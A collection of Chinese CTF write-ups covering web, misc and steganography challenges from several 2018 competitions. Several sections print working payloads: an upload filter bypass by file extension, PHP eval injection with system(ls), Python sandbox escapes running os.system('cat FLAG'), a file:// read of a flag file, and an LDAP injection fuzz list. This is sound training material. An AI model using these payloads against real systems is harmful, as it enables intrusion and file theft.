点击阅读

123

源码提示

<!-- 用户信息都在user.php里 -->
<!-- 用户默认默认密码为用户名+出生日期 例如:zhangwei1999 -->

user.php空白，user.php.bak内容含很多用户名，可用来爆破，扫描得到的flag.php并没有flag

选burp的attack type为pitchfork，set两个payload爆破
得到用户和密码

源码提示：

<!-- 存在漏洞需要去掉  -->
<!-- <form action="" method="POST" enctype="multipart/form-data">
	<input type="file" name="file" />
	<input type="submit" name="submit" value="上传" />
</form> -->

去掉注释，补上action，上传文件

phmtl后缀绕过

得到：
<a href="/view.php">view</a>

view.php提示file，传入file参数又提示filter “flag”，过滤了flag

双写绕过

http://9df2aa756fb048e7b0df80c187e5d350b037754437604bc6.game.ichunqiu.com/view.php?file=flflagag

flag{d0b2de22-fe4d-48ee-a447-f010dc83c087}

https://shrimphp.herokuapp.com/?%F0%9F%8D%A4=%22.system(ls).%22

<?php
// flag{thisisnotflag}
highlight_file(__FILE__);
$_ = $_GET['🍤'];
//$_ = '".system(ls)."';
if( strpos($_, '"') || strpos($_, "'") || strpos($_, "_") || strpos($_, "[") || strpos($_, "$") ) 
    die('What did you do?????');

eval('die("' . substr($_, 0, 16) . '");');
echo 'Try harder!!!!';

?🍤=".system(ls)."

flag{php_is_good_for_hackers!!!!}

Web Book

link to Web_BooK:http://34.216.132.109:8083/fp/

只能不停点击next，用脚本模拟

#coding: utf-8
import requests
import re

url = 'http://34.216.132.109:8083'
get = '/fp/'
s = requests.Session()

while 1:
    r = s.get(url+get)
    h = r.text
    if 'flag' in h:
        print h
        exit
    get = re.findall('<form action="(.*?)" method="get">',h)[0]
    print '[*] try '+get

最终得到flag

Shrine

题目给出源码

import flask
import os


app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])+s
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

flag是一个特定的配置值，/shrine/后面存在模版注入，过滤了（），添加了黑名单，无法通过来读取配置值，也不能用获取对象的属性值

然后通过拜读wp知道，为了获得配置信息，需要从它的上全局变量(current_app等)访问config。

示例：

__globals__['current_app'].config['FLAG']

top.app.config['FLAG']

所有的函数都会有一个globals属性,它会以一个dict，返回函数所在模块命名空间中的所有变量

一些方法：

1. url_for函数

找到current_app

读取flag

2. get_flashed_messages函数

找到current_app

读取flag

3. request

noxCTF

Reference

What is your reference again?

http://chal.noxale.com:5000

页面显示where the ** did you come from?，根据题意要添加Referer头

根据index.js

$( document ).ready(function() {
    $.ajax({
        url: "check_from_google",
        data: NaN,
        success: function(result) {
            $("#status").html("hello old friend! " + atob(result))        
        },
        dataType: NaN
    }).fail(function() {
        $("#status").html("where the **** did you come from?")
    });
});

应该在http://chal.noxale.com:5000/check_from_google判断是否来自google

curl -H "Referer: https://www.google.com/" http://chal.noxale.com:5000/check_from_google

得到base64，解码得到flag

noxCTF{G0ogL3_1s_4lW4Ys_Ur_b3ST_R3f3r3nc3}

MyFileUploader

This is my new file uploader server. I bet you can’t hack it!

http://chal.noxale.com:8079

开始是文件上传，抓包

发现总会删除最后的.php,且必须包含.jpg等图片后缀，于是用.jpg.php.php成功上传

index.php:

<html>
   <head>
      <title>My file uploading website!</title>
      <meta name = "viewport" content = "width = device-width, initial-scale = 1">      
      <link rel = "stylesheet"
         href = "https://fonts.googleapis.com/icon?family=Material+Icons">
      <link rel = "stylesheet"
         href = "https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css">
      <script type = "text/javascript"
         src = "https://code.jquery.com/jquery-2.1.1.min.js"></script>           
      <script src = "https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js">
      </script> 
   </head>
   
   <body class = "container">  
    <h5> It is the most secure uploading server in the world! <br></h5> 
      <div class = "row">
         <form enctype="multipart/form-data" class = "col s6 push-s3" method="POST" action=''>
            <div class = "row">
               <div class = "file-field input-field">
                  <div class = "btn">
                     <span>Browse</span>
                     <input type = "file" name="upload"/>
                  </div>
                  
                  <div class = "file-path-wrapper">
                     <input class = "file-path validate" type = "text"
                        placeholder = "Upload file" />

                  <button class="btn waves-effect waves-light" type="submit" name="action">Submit
                    <i class="material-icons right">send</i>
                  </button>
        
                  </div>

                  <p style="text-align:center" class="col push-s3">
                    <?php

                    if(isset($_POST['action']))
                    {
                      if($_FILES["upload"]["error"] != 0) die("Problem occured with file upload");
                      $target_path = "uploads";
                      $file_name = $_FILES["upload"]['name'];
                      $file_type = $_FILES["upload"]['type'];
                      $file_name = preg_replace("/(\.php$|\.html$)/i", "", $file_name);
                      
                      echo "File: " . $file_name . "<br>";
                      if(preg_match("/(.jpg|.png|.gif)/i", $file_name))
                      {
                        move_uploaded_file($_FILES['upload']['tmp_name'], "{$target_path}/{$file_name}");
                        echo "Image uploaded to: <a href='{$target_path}/{$file_name}'>Here</a> <br>";
                      }
                      else
                      {
                        echo "There is no .png/.jpg/.gif in that file name";
                      }
                    }
                    ?>
                  </p>
               </div>
            </div>
         </form>       
      </div>
   </body>   
</html>

不过菜刀连接返回500，直接传一个执行命令的php，却怎么也找不到flag在哪，uploads目录下可能含flag的文件，7H3-FL4G-1S-H3r3，flag.txt等无权限访问，应该是做了权限处理

../.htaccess文件：

Options +Indexes
AddType application/x-httpd-php .cyb3r

<files flag.txt>
	order allow,deny
	deny from allow
</files>
<files "Dockerfile">
	Order deny,allow
	Deny from all
</files>
<files "apache2.conf">
	Order deny,allow
	Deny from all
</files>
<files ".htaccess">
	Order deny,allow
	Deny from all
</files>

IndexIgnore *php *pht *txt *png *jpg *gif *cyb3r *php* *Cyb3r

然后不知道怎么办了，在uploads下弄了个.htaccess，然后访问uploads就Internal Server Error，可能被我弄坏了吧

过了几个小时又好了，应该是管理员重置了题目，这次uploads下文件较少，flag应该就在7H3-FL4G-1S-H3r3里，但仍don’t have permission to access /uploads/7H3-FL4G-1S-H3r3

最后ls -l查看权限时出了flag

Marcode

Marcode (Mr. Code in Hebrew), Ineed your help!
I got a movie but I cant see it. It hypnotizes me.
please help me!
yours,
Gveretcode (Mrs. Code in Hebrew)

P.S.
change NOXCTF to noxCTF.
https://drive.google.com/open?id=1GkalBntU1s6d_sw_S5I4GinD8hBrh-C-

这是个很有意思的题

先通过url下载得到一个mp4，打开后不断切换着二维码，根本没法扫

长达两分多钟，得用脚本了

#coding: utf-8

import cv2 

videoCapture = cv2.VideoCapture()
videoCapture.open('/Users/xc/Downloads/Marcode.mp4')

fps = videoCapture.get(cv2.CAP_PROP_FPS)
frames = videoCapture.get(cv2.CAP_PROP_FRAME_COUNT)
#fps是帧率，意思是每一秒刷新图片的数量，frames是一整段视频中总的图片数量。
print("fps=",fps,"frames=",frames)

for i in range(int(frames)):
    ret,frame = videoCapture.read()
    cv2.imwrite("./Marcode-jpg/mp4-(%d).jpg"%i,frame)

把视频中的每一帧都存为jpg，跑完得到3490个jpg，每一个二维码扫完都会得到一个google云盘url，访问能看到仅含一个字符的小图片

再用脚本把每一个jpg都扫一遍，大部分url是重复的，最终得到28个不同的url

等于每个url表示一个字符，又用脚本做了url对应字符的字典，再跑一遍jpg得到一篇文章，是Harry Potter的Chapter 1 The Dark Lord Ascending

搜原文，处理下再burp compare，应该就能得到flag了

弄什么harry potter，原文都不一样，眼都看瞎了,最终找不同得到

n o x ctf a into-with v impaosing-impressive d a was-were k e d a toward-towards inward-inwards v wall-walls r  upward -upwards a

不知flag到底怎么写，比赛结束看到wp，flag竟是noxCTF{AVADAKEDAVRA}

扫描的脚本：

#coding: utf-8
from PIL import Image
from pyzbar.pyzbar import decode

urllist = []
picdict = {}
pdic = {'https://drive.google.com/open?id=131OPuwNVggs0ZAsVie4dfA3k9zLWN-uu': 'T', 'https://drive.google.com/open?id=1c-go7QIZb_yqGDsRKlXG1j1Py7-wcSFG': 'H', 'https://drive.google.com/open?id=1upmw0QvLjzp6b7RjCrjJGjYfRijF82-g': 'E', 'https://drive.google.com/open?id=1vHlCNodJ84iw51C8gIz4hr0UpsWNx3fm': '_', 'https://drive.google.com/open?id=1mZivmNZ8uDiUb5YUoF8sj9kZXKkh7GNO': 'W', 'https://drive.google.com/open?id=1pXSHKhMzuKrUMg0x8ygZ36yTn0-9nBe8': 'O', 'https://drive.google.com/open?id=1b5wz-LsIBxnA7mp5ImbNLZQY0nob94OO': 'M', 'https://drive.google.com/open?id=1cZlhiRoZcEiaNEwScBQd0IA2PXh1Z1tX': 'N', 'https://drive.google.com/open?id=1OqacmR-Ccc2YLVYCS2co4dWtSqfEGxIl': 'A', 'https://drive.google.com/open?id=1DF2RneUWAb6wqp7YJ0vjOwDJGdENEc0Q': 'P', 'https://drive.google.com/open?id=1lKeCjQFcTSuUzMGUEeEzPj4d2x1MLTJm': 'R', 'https://drive.google.com/open?id=1JtDxAfX8AEC_mFzJPZofI1RyOL62MAmk': 'D', 'https://drive.google.com/open?id=1hjIQq2fEcduFF0CfRs-MJ2hlCuC5lkW6': 'U', 'https://drive.google.com/open?id=1rHGDe2F5vLws9fA0M3L9IELX9LYaU50x': 'F', 'https://drive.google.com/open?id=1p4m9gtvh31s2SJ9G1uNr8burIvQabm_k': '?', 'https://drive.google.com/open?id=1g2I1a09lO4m0imhIzJ60LUeDPNDIdIp_': 'Y', 'https://drive.google.com/open?id=1lSanpoEq3LeV0aaL6KEnUiJE2iGijdrt': 'S', 'https://drive.google.com/open?id=1Rw-Op049iTliLPFTTRj7p4gBXmm8IboN': 'I', 'https://drive.google.com/open?id=1H5DHyv0METKfLV7xdzw-SVXU_F1o1iKM': 'L', 'https://drive.google.com/open?id=1GLtL-X1IS4ms6fwC2OQV4jAmXjI_6bjQ': 'C', 'https://drive.google.com/open?id=1vPBtiNzUzYEOEKFK60vG305uPw9CDy8p': 'Q', 'https://drive.google.com/open?id=1DV0ACuyKWsFm2ApXgHHDP_DSzwqmtt5M': 'G', 'https://drive.google.com/open?id=1nlp-HIwnRbG61mf5SF_BzMdlNAR7tHLt': 'Z', 'https://drive.google.com/open?id=151y0xa6hnTR9yp9G0D-dyox08bV4-JZX': 'B', 'https://drive.google.com/open?id=1dtYor_A9Sf3DDTlczTLA0s9rBluVNoOX': 'K', 'https://drive.google.com/open?id=1UpU1_MTK-0XgCpcZKC4AVGsBswNpQTBO': 'X', 'https://drive.google.com/open?id=1apKMrqUwZn5dOkRWfjbYgYH_RvkmPD2P': 'V', 'https://drive.google.com/open?id=1uynnoN7ItBRls7MiqFa1rLE-W3o9CnY5': 'J'}
sum = 0
code = []
codes = "THE_WOMNAPRDUF?YSILCQGZBKXVJ"
string = ''
for ac in codes:
    code.append(ac)
'''print (code)'''
for i in range(0,3490):
    name = "mp4-("+str(i)+").jpg"
    decode_result = decode(Image.open(name))
    url = str(decode_result[0].data, encoding='utf-8')
    string = string + pdic[url]
    print (string)
    '''
    if url not in urllist:
        picdict[url] = code[sum]
        sum = sum + 1    
        urllist.append(url)
        #print ('[+] '+name+' :'+url)
    '''
#print ("totla is "+str(sum))
#print (picdict)
print (string)

以下是看wp后的记录

hiddenDOM

I decided to create a tool that searches for
hidden elements inside a web pages.
Few days ago someone told me that my website is not so /secure/…
Can you check it yourself ?

http://13.59.2.198:5588

解码之后的一段js

var _0x2b80 = ["slow", "fadeOut", "#hidden_elements", "click", "#hideArea", "ready", "fadeIn", "#showArea"];
$(document)[_0x2b80[5]](function() {
  $(_0x2b80[4])[_0x2b80[3]](function() {
    $(_0x2b80[2])[_0x2b80[1]](_0x2b80[0]);
  });
});
$(document)[_0x2b80[5]](function() {
  $(_0x2b80[7])[_0x2b80[3]](function() {
    $(_0x2b80[2])[_0x2b80[6]](_0x2b80[0]);
  });
});

起作用就是创建

<form id="main_form" action="index.php" style="position:sticky;">
<input name="expression" placeholder="/<[^<>]{1,}hidden[^<>]{1,}>/" type="text">

相比之前还要输入一个expression

输入源码里<a href='/var/www/html/flag.txt' hidden >-_-</a><p style='color:red;'></p>中的路径后得到另一段js,不过没用

满足expression的正则，file读取文件

?target=file:///var/www/html/flag.txt&expression=/.*/

Python for fun - Misc

http://chal.noxale.com:8000/

传递两个被解释的参数进行注入

a,b=print(exec("import os"),eval("os.listdir('.')"))

a,b=print(open("FLAG", "r").read())

Python for fun 2

''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"].modules["os"].system("cat FLAG")

LDAP injection

http://web.chal.csaw.io:8080/index.php?search=

LDAP注入是一种攻击，用于利用基于web的应用程序，这些应用程序基于用户输入构建LDAP语句。当应用程序无法正确清理用户输入时，可以使用本地代理修改LDAP语句。这可能会导致执行任意命令，例如授予未授权查询的权限，以及在LDAP树内修改内容。SQL注入中可用的相同高级开发技术可以类似地应用于LDAP注入中。

服务查询类似：
(&(GivenName=<INPUT>)(!(GivenName=Flag)))

利用*)(uid=*))(|(uid=*绕过

完整语句：
(&(GivenName=*)(uid=*))(|(uid=*)(!(GivenName=Flag)))

查询语法：
http://www.361way.com/ldap-query-grammar/2542.html

fuzz:

*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*

hackitctf

ge going

https://ctf.hackit.ua/w31c0m3

这是个比较新的隐写思路,相关内容比较少

零宽度字符是隐藏不显示的，也是不可打印的，也就是说这种字符用大多数程序或编辑器是看不到的。

相关文章：

• http://www.freebuf.com/articles/web/167903.html
• https://www.tr0y.wang/2018/04/20/ZeroWidthSpacesHiden/

在题目这句W‏‍‏‌‎‎‏‍‏‎‏‏‎‏‎‏‍‌‎‏‏‎‏‍‏‍‌‍‌‍‌‎‏‏‏‍‍‎‏‏‏‌‍‍‌‏‍‏‏‏‍‎‏‏‎‏‌‏‏‏‎‌‏‏‎‏‏‎‍‏‍‌‏‏‎‏‏‌‏‎‏‍‌‌elcome to the HackIT 2018 CTF, flag is somewhere here. ¯_(ツ)_/¯的W和e之间就隐藏着如下零宽度字符

​​​​‏​‍​​​​‏‌‎​​​​‎‏‍​​​​‏​‎​​​​‏‏‎​​​​‏‎‏​​​​‍​‌​​​​‎‏​​​​​‏​‎​​​​‏‍‏​​​​‍​‌​​​​‍​‌​​​​‍‌​​​​​‎‏​​​​​‏​‏​​​​‍​‍​​​​‎‏‏​​​​‏‌‍​​​​‍​‌​​​​‏‍‏​​​​‏‏‍​​​​‎‏​​​​​‏‎‏​​​​‌‏‏​​​​‏‎‌​​​​‏​‏​​​​‎‏​​​​​‏‎‍​​​​‏‍​​​​​‌‏‏​​​​‎‏‏​​​​‌‏‎​​​​‏​​​​​​‍​‌​​​‌​​​

‌

它叫零宽不连字，全称是Zero Width Non Joiner，简称“ZWNJ”，是一个不打印字符，放在电子文本的两个字符之间，抑制本来会发生的连字，而是以这两个字符原本的字形来绘制。Unicode中的零宽不连字字符映射为“”（zero width non-joiner，U+200C），HTML字符值引用为： ‌

‍

它叫零宽连字，全称是Zero Width Joiner，简称“ZWJ”，是一个不打印字符，放在某些需要复杂排版语言（如阿拉伯语、印地语）的两个字符之间，使得这两个本不会发生连字的字符产生了连字效果。零宽连字符的Unicode码位是U+200D (HTML: ‍ ‍）。

‎

左至右符号（Left-to-right mark,LRM）是一种控制字符，或者说是不可见的排版符号。左至右符号的统一码字符是U+200E，亦可在HTML中表现为‎ ‎或者‎, UTF-8中则是E2 80 8E。

‏

右至左符号（Right-to-left mark,RLM）是一种控制字符，用于计算机的双向文稿排版中。右至左符号的Unicode字符是U+200F，亦可在HTML中表现为‏ ‏或者‏

​

零宽空格（zero-width space, ZWSP）是一种不可打印的Unicode字符，用于可能需要换行处。在Unicode中，该字符为U+200B“”零宽空格 ，HTML：​。

这里的零宽度字符可用https://github.com/offdev/zwsp-steg-js解密

de.js内容为

运行获取flag